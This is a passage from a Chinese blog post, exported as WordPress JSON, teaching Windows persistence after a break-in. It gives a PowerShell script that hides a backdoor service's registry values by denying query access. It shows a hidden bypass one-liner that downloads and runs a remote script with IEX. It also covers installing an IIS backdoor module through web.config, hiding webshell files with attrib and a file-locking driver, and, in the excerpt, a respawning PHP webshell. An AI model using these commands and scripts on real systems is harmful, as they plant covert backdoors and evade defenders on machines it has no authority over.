\/><\/p>\n<p>\u5728\u77e5\u9053\u670d\u52a1\u540d\u7684\u524d\u63d0\u4e0b\u67e5\u8be2\u4f1a\u663e\u793a\u62d2\u7edd\u8bbf\u95ee\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">sc query \".NET CLR Networking 3.5.0.0\"<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae483c87e7.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609618977-a69fd8c8-0dc8-4e17-bc15-56ce2d955222.png\" \/><\/p>\n<p>\u4f46\u8fd9\u6837\u505a\u6709\u4e00\u4e2a\u95ee\u9898\uff1a\u5728\u6ce8\u518c\u8868\u4e2d\u5f88\u5bb9\u6613\u770b\u5230\u5f02\u5e38value<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices.NET CLR Networking 3.5.0.0<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae486a5761.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609630974-4d958eed-aba3-4996-9f2d-5eaff25293dc.png\" \/><\/p>\n<p>\u4fee\u6539\u6ce8\u518c\u8868ACL<\/p>\n<p>\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u4fee\u6539\u6ce8\u518c\u8868\u7684DACL\u6765\u62d2\u7edd\u5bf9\u503c\u7684\u67e5\u8be2\uff0c\u8fbe\u5230\u9690\u85cf\u5f02\u5e38\u503c\u7684\u6548\u679c<\/p>\n<p>\u8fd9\u91cc\u7ed9\u51fa\u4e00\u4e2a\u901a\u8fc7powershell\u4fee\u6539\u6ce8\u518c\u8868\u9879\u7684\u8bbf\u95ee\u6743\u9650\u7684\u7b80\u5355\u811a\u672c<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">function Server-Sddl-Change{\n[CmdletBinding()]\nparam\n(\n[parameter(Mandatory=$false)][String]$Name\n)\n$ROOT = \"HKLM:SYSTEMCurrentControlSetServices\"\n$S = $ROOT+$NAME\n$acl = Get-Acl $S\n$acl.SetAccessRuleProtection($true, $false)\n$person = [System.Security.Principal.NTAccount]\"Everyone\"\n$access = [System.Security.AccessControl.RegistryRights]\"QueryValues\"\n$inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\n$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\n$type = [System.Security.AccessControl.AccessControlType]\"Deny\"\n$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\n$person,$access,$inheritance,$propagation,$type)\n$acl.AddAccessRule($rule)\n$person = [System.Security.Principal.NTAccount]\"Everyone\"\n$access =\n[System.Security.AccessControl.RegistryRights]\"SetValue,CreateSubKey,EnumerateSu\nbKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,Chang\nePermissions,TakeOwnership\"\n$inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\n$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\n$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\n$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\n$person,$access,$inheritance,$propagation,$type)\n$acl.AddAccessRule($rule)\nSet-Acl $S $acl\n}<\/code><\/pre>\n<p>\u8fdc\u7a0b\u52a0\u8f7dpowershell\u811a\u672c<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">powershell.exe -exec bypass -nop -w hidden -c \"IEX((new-object\nnet.webclient).downloadstring('http:\/\/192.168.0.149\/1.ps1'));Server-Sddl-Change -\nName '.NET CLR Networking 3.5.0.0'\"<\/code><\/pre>\n<p>.NET CLR Networking 3.5.0.0 \u6539\u6210\u4f60\u7684\u670d\u52a1\u540d<\/p>\n<p>\u4ece\u4e0b\u56fe\u53ef\u89c1\u5df2\u5c06\u503c\u4ece\u8be5\u670d\u52a1\u9879\u4e2d\u9690\u85cf<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae48e9d19c.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609671096-747a7864-dff6-442f-bb37-46df7dd536c4.png\" \/><\/p>\n<p>\u91cd\u542f\u8ba1\u7b97\u673a \u83b7\u53d6\u540e\u95e8<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4917ad50.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609686423-6aba7f5a-fb2d-4e7b-b782-a4f4b87b1343.png\" \/><\/p>\n<h1>iis\u540e\u95e8<\/h1>\n<p>web\u670d\u52a1\u5668\u4e0a\u4e00\u822c\u90fd \u652f\u6301net \u6240\u4ee5\u53ef\u4ee5\u8003\u8651\u5229\u7528net iis\u505a\u4e00\u4e2a\u540e\u95e8<\/p>\n<p>\u9879\u76ee\u5730\u5740 <a href=\"https:\/\/github.com\/WBGlIl\/IIS_backdoor\">https:\/\/github.com\/WBGlIl\/IIS_backdoor<\/a><\/p>\n<p>\u5728\u7f51\u7ad9\u76ee\u5f55\u4e0b\u65b0\u5efa\u4e00\u4e2abin\u6587\u4ef6\u5939 \u8fd9\u4e2a\u6587\u4ef6\u5939 \u5b58\u653edll\u96c6 \u628aIIS_backdoor_dll.dll\u5b58\u653e\u5728\u8fd9\u91cc\u9762<\/p>\n<p>\u65b0\u5efa web.config \u6216\u8005\u5728\u539f\u6709\u7684\u6587\u4ef6\u4e0a\u6dfb\u52a0 \u5185\u5bb9<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;configuration&gt;\n&lt;system.webServer&gt;\n&lt;modules&gt;\n&lt;add name=\"IIS_backdoor\" type=\"IIS_backdoor_dll.IISModule\" \/&gt;\n&lt;\/modules&gt;\n&lt;\/system.webServer&gt;\n&lt;\/configuration&gt;<\/code><\/pre>\n<p>\u6253\u5f00 IIS_backdoor_shell \u628a\u7f51\u5740\u586b\u5199\u8fdb\u53bb\u5373\u53ef<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae49485c8a.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609726724-8f4752b3-8b35-4c4b-883d-0d26b1147908.png\" \/><\/p>\n<h1>window \u9690\u85cf\u6280\u672f<\/h1>\n<p>\u4f7f\u7528Attrib +s +a +h +r\u547d\u4ee4\u5c31\u662f\u628a\u539f\u672c\u7684\u6587\u4ef6\u5939\u589e\u52a0\u4e86\u7cfb\u7edf\u6587\u4ef6\u5c5e\u6027\u3001\u5b58\u6863\u6587\u4ef6\u5c5e\u6027\u3001\u53ea\u8bfb\u6587\u4ef6\u5c5e\u6027\u548c\u9690\u85cf\u6587\u4ef6\u5c5e\u6027<\/p>\n<p>\u8fd9\u6837\u5c31\u505a\u5230\u4e86\u771f\u6b63\u7684\u9690\u85cf\uff0c\u4e0d\u7ba1\u4f60\u662f\u5426\u663e\u793a\u9690\u85cf\u6587\u4ef6\uff0c\u6b64\u6587\u4ef6\u5939\u90fd\u770b\u4e0d\u89c1<\/p>\n<p>Attrib +s +a +h +r 1.php<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4982b171.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609750109-08337c09-90cf-480b-8d82-91ecd9bcda04.png\" \/><\/p>\n<p>\u8fd9\u6837\u7b97\u662f\u9690\u85cf \u5176\u5b9e\u8fd8\u6709\u67e5\u770b\u65b9\u6cd5<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae49b85940.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609760420-4cad4529-045b-40d6-8876-1841f219f40b.png\" \/><\/p>\n<h1>\u9a71\u52a8\u7ea7\u6587\u4ef6\u9690\u85cf<\/h1>\n<p>\u9a71\u52a8\u9690\u85cf\u6700\u5178\u578b\u7684\u73b0\u8c61\u5c31\u662f\u7cfb\u7edf\u76d8\u4e2d\u5b58\u5728\u4ee5\u4e0b\u6587\u4ef6\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">c:WINDOWSxlkfs.dat\nc:WINDOWSxlkfs.dll\nc:WINDOWSxlkfs.ini\nc:WINDOWSsystem32driversxlkfs.sys<\/code><\/pre>\n<p>\u9a71\u52a8\u9690\u85cf\u6211\u4eec\u53ef\u4ee5\u7528\u8fc7\u4e00\u4e9b\u8f6f\u4ef6\u6765\u5b9e\u73b0\uff0c\u8f6f\u4ef6\u540d\u5b57\u53eb\uff1aEasy File Locker \u4e0b\u8f7d\u94fe\u63a5\uff1a <a href=\"http:\/\/www.xosla\">http:\/\/www.xosla<\/a>b.com\/efl.html<\/p>\n<p>\u4e00\u822c\u505a\u9ed1\u94fe\u7684\u5c0f\u670b\u53cb\u90fd\u4f1a\u8fd9\u6837\u8bbe\u7f6e\uff1a\u53ea\u52fe\u9009\u53ef\u8bfb\uff0c\u5176\u4ed6\u7684\u4e00\u5f8b\u62d2\u7edd\u2026\u2026\u90a3\u4e48\uff0c\u4f1a\u6709\u8fd9\u6837\u7684\u6548\u679c\uff0c\u8be5\u6587\u4ef6\u4e0d\u4f1a\u663e\u793a\uff0c\u4e0d\u80fd\u901a\u8fc7\u5217\u76ee\u5f55\u5217\u51fa\u6765\uff0c\u4e5f\u4e0d\u80fd\u5220\u9664\uff0c\u9664\u975e\u4f60\u77e5\u9053\u5b8c\u6574\u8def\u5f84\uff0c\u4f60\u624d\u53ef\u4ee5\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9<\/p>\n<p>\u5e76\u4e14\u8be5\u8f6f\u4ef6\u8fd8\u53ef\u4ee5\u8bbe\u7f6e\u5bc6\u7801\uff0c\u542f\u52a8\u3001\u4fee\u6539\u8bbe\u7f6e\u3001\u5378\u8f7d\u53ca\u91cd\u590d\u5b89\u88c5\u7684\u65f6\u5019\u90fd\u9700\u8981\u5bc6\u7801\uff0c\u66f4\u86cb\u75bc\u7684\u662f\uff0c\u4e3b\u754c\u9762\u3001\u5378\u8f7d\u7a0b\u5e8f\u7b49\u90fd\u53ef\u4ee5\u5220\u9664\uff0c\u53ea\u7559\u4e0b\u6838\u5fc3\u7684\u9a71\u52a8\u6587\u4ef6\u5c31\u884c\u4e86\u3002\u5982\u4f55\u6e05\u9664\uff1f<\/p>\n<p>1\u3001\u67e5\u8be2\u670d\u52a1\u72b6\u6001\uff1a sc qc xlkfs<\/p>\n<p>2\u3001\u505c\u6b62\u670d\u52a1\uff1a net stop xlkfs \u670d\u52a1\u505c\u6b62\u4ee5\u540e\uff0c\u7ecf\u9a71\u52a8\u7ea7\u9690\u85cf\u7684\u6587\u4ef6\u5373\u53ef\u663e\u73b0<\/p>\n<p>3\u3001\u5220\u9664\u670d\u52a1\uff1a sc delete xlkfs<\/p>\n<p>4\u3001\u5220\u9664\u7cfb\u7edf\u76ee\u5f55\u4e0b\u9762\u7684\u6587\u4ef6\uff0c\u91cd\u542f\u7cfb\u7edf\uff0c\u786e\u8ba4\u670d\u52a1\u5df2\u7ecf\u88ab\u6e05\u7406\u4e86\u3002<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae49e633af.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609814656-c4e273b9-f2c2-4b60-b4bb-fc3ace4b9590.png\" \/><\/p>\n<blockquote>\n<p>\u66f4\u65b0: 2025-05-07 17:24:36<br \/>\n\u539f\u6587: <a href=\"https:\/\/www.yuque.com\/yuhui.net\/network\/modnzu7gppc1bxe9\">https:\/\/www.yuque.com\/yuhui.net\/network\/modnzu7gppc1bxe9<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>Windows\u6743\u9650\u7ef4\u6301 php \u4e0d\u6b7b\u9a6c\u6743\u9650\u7ef4\u6301 &lt;?php ignore_user_abort(); \/\/\u5173\u6389\u6d4f\u89c8\u5668\uff0cPHP\u811a\u672c\u4e5f\u53ef\u4ee5\u7ee7\u7eed\u6267\u884c. set_time_limit(0);\/\/\u901a\u8fc7set_time_limit(0)\u53ef\u4ee5\u8ba9\u7a0b\u5e8f\u65e0\u9650\u5236\u7684\u6267\u884c\u4e0b\u53bb $interval = 5; \/\/ \u6bcf\u9694*\u79d2\u8fd0\u884c do { $filename = &#8216;test.php&#8217;; if(file_exists($f [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[123,119,2],"tags":[12,17,22,43],"class_list":["post-792","post","type-post","status-publish","format-standard","hentry","category-tiquan","category-shentouceshijichu-network_sec","category-network_sec","tag-12","tag-github","tag-windows","tag-43"],"_links":{"self":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/792","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/comments?post=792"}],"version-history":[{"count":0,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/792\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/media?parent=792"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/categories?post=792"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/tags?post=792"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}